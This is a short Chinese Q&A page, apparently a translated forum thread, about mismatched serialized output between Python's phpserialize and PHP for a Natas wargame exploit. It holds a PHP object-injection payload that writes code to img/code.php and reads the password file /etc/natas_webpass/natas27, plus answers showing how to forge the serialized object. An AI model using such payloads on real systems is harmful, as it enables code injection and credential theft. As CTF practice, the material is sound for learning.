Python phpserialize意外行为

import base64 from phpserialize import serialize payload = {'initMsg': "", 'exitMsg': "<?php include('/etc/natas_webpass/natas27');?>", 'logFile': "img/code.php"} new_ser = base64.encodestring(serialize(payload)) print(new_ser)

PHP代码

<?php class Logger{ private $logFile; private $initMsg; private $exitMsg; function __construct(){ $this->initMsg = ""; $this->exitMsg = "<?php include('/etc/natas_webpass/natas27');?>"; $this->logFile = "img/code.php"; } } $obj = new Logger(); echo base64_encode(serialize($obj)); ?>

PHP代码产生：

Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxMjoiaW1nL2NvZGUucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO3M6MDoiIjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6NDY6Ijw/cGhwIGluY2x1ZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO30=

python代码生成：

b'YTozOntzOjc6ImluaXRNc2ciO3M6MDoiIjtzOjc6ImV4aXRNc2ciO3M6NDY6Ijw/cGhwIGluY2x1\nZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO3M6NzoibG9nRmlsZSI7czoxMjoi\naW1nL2NvZGUucGhwIjt9\n'

2条回答

网友

1楼 · 编辑于 2024-10-03 21:24:57

在python版本中序列化散列，在PHP中序列化对象一个。就一个将对象转换为哈希（关联数组），它将产生相同的结果：

<?php
$obj = array();
$obj['initMsg'] = '';
$obj['exitMsg'] = "<?php include('/etc/natas_webpass/natas27');?>";
$obj['logFile'] = "img/code.php";
echo base64_encode(serialize($obj));
?>

网友

2楼 · 编辑于 2024-10-03 21:24:57

在查看了文档之后，我提出了一个解决方案，首先将数据转换为对象，然后进行序列化。你知道吗

@Maxim让PHP代码像python一样，

下面的代码使Python代码与PHP类似

感觉这是一个艰难的方法，不确定这是否可以变得更简单。你知道吗

class Logger():
    def __init__(self,initMsg,exitMsg,logFile):
        self.initMsg = initMsg
        self.exitMsg = exitMsg
        self.logFile = logFile

def object_hook(obj):
    if isinstance(obj, Logger):
        return phpobject('Logger', {b'\x00Logger\x00initMsg': obj.initMsg, b'\x00Logger\x00exitMsg': obj.exitMsg, b'\x00Logger\x00logFile': obj.logFile})

logger = Logger("", "<?php include('/etc/natas_webpass/natas27');?>", "img/code.php")    
new_ser = base64.encodestring(serialize(logger, object_hook=object_hook)).replace(b'\n', b'').decode('ascii')

Python代码

PHP代码

相关问题更多 >

编程相关推荐

热门问题

热门文章